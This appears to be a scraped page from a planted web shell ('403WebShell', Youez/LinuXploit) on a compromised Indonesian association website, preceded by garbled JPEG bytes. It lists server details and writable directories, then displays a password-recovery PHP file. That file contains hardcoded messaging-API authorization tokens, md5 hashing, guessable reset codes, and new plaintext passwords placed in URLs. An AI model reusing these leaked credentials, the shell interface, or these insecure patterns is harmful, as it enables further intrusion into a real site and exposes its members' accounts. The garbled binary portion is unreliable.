JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 77.37.66.228  /  Your IP : 216.73.216.163
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u686484674/domains/idikotabandung.com/public_html/IDI/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /home/u686484674/domains/idikotabandung.com/public_html/IDI/cekid.php
<?php

  ob_start();

?>

<!DOCTIPE html>

<html>

<head>

<meta charset="utf-8">

    <meta http-equiv="X-UA-Compatible" content="IE=edge">

    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->

    <meta name="description" content="">

    <meta name="author" content="">

    <link rel="icon" href="assets/img/icon.png">



    <title>IDI</title>





</head>

<body>

<?php

session_start();



include "koneksi.php";

// VARIABEL ini akan memastikan bahwa inputan user tidak mengandung ciri ciri tindakan SQL Injection

$username = mysqli_real_escape_string($konek, $_POST['username']);

$p = mysqli_real_escape_string($konek,md5( $_POST['password']));







//$username = $_POST["username"];

//$p = md5($_POST["password"]);



$sql = "select * from mahasiswa where npm='".$username."' and status='aktif' limit 1";

$hasil = mysqli_query ($konek,$sql);

$jumlah = mysqli_num_rows($hasil);





	if ($jumlah>0) {

		$row = mysqli_fetch_assoc($hasil);

			

				if($row['status']=='aktif'){

					$_SESSION['email']= $row['email'];

					$_SESSION['npm']= $row['npm'];

					$_SESSION['nama_mhs']= $row['nama_mhs'];

					$nmlead= $row['nama_mhs'];

					$_SESSION['telp']= $row['telp'];

					$email= $row['email'];

					$telp= $row['telp'];

					

		function acakCaptcha() {

        $kode = "123456789";

    

        $passc = array(); 



        $panjangkode = strlen($kode) - 2; 

        for ($i = 0; $i < 6; $i++) {

            $n = rand(0, $panjangkode);

            $passc[] = $kode[$n];

        }

         return implode($passc); 

    }

    

    //hasil kode acak disimpan di $code

    $code = acakCaptcha();

    $pass= $code;

	

//	$_SESSION['pass']= $pass;	

		

	$to = $email;

					

					

	$pass_md5 = md5($pass);	

		

	$update2 = mysqli_query($konek, "UPDATE mahasiswa SET password='$pass_md5' WHERE npm='$username'");	

	

	$nmlead= $row['nama_mhs'];				

define('ROOT', 'http://idikotabandung.com/IDI/');



 $web2 = ROOT."login.php?npm=$username&pass=$pass" ;





//$web='https://is3.cloudhost.id/alatwa.com/assets/img/background-alatwa-com-free-trial-7-days.png';

$web='https://idikotabandung.com/registrasi/image/idibdg.jpg';

$header = array(

    "Content-Type: application/json",

  //  "Authorization: 1e6b5ee17374261fab972cc85aa1d958"

      "Authorization: 92dfc535e4d2f2466543947fb63f3e1a"

);

$data = array(
    "device" => "888397525616",

    "phone" => "$telp",

	"message" => "

	

	Recovery Password :

	Nama	    : $nmlead 

	ID Login    : *$username*   

	Passwor Baru: *$pass*

	

Login silashkanClick langsung  Link dibawah :

$web2

",

    "url" =>  "$web"

);



$param_post = json_encode($data, JSON_PRETTY_PRINT);

$post        = curl_init("https://app.alatwa.com/api/send/message/media");

//$post        = curl_init("https://app.alatwa.com/api/send/message/text");

curl_setopt($post, CURLOPT_HTTPHEADER, $header);

curl_setopt($post, CURLOPT_POST, 1);

curl_setopt($post, CURLOPT_POSTFIELDS, $param_post);

curl_setopt($post, CURLOPT_RETURNTRANSFER, true);

curl_setopt($post, CURLOPT_CONNECTTIMEOUT, 0); 

curl_setopt($post, CURLOPT_TIMEOUT, 5);

$response = curl_exec($post);

curl_close($post);

echo $response;			

					

					

$header = "From: info@idikotabandung.com";

$subjek="Recovery Password";

$pesan  = "

Kepada Yth: Mr.$nmlead, 



Recovery Password anda :





User 		: $username

password	: $pass



Silahkan login kembali





Demikian konfirmasi kami, terimakasih.



Regards

Sekertariat IDI Bandung





";





mail($to,$subjek,$pesan,$header);

			

					

					header("Location:./vermail.php?username=$username&email=$email");

						

				}else {

				echo "ID Login tidak diketemukan hub Admin via WA <br><a href='login2.php'>Kembali</a>";

		

					echo "<script class ='merah'>window.alert('Notif: ID Login tidak diketemukan hub Admin via WA')

				           window.location='forgot.php'</script>"; 

					}

	}else{

		echo "<script class ='merah'>window.alert('Notif: ID Login tidak diketemukan hub Admin via WA..') window.location='forgot.php'</script>";

		

	header("location:forgot.php?pesan=Login gagal,ID Login tidak diketemukan hub Admin via WA..!");

	

	

}

?>

</body>

</html>

<?php

  ob_end_flush();

?>

Youez - 2016 - github.com/yon3zu
LinuXploit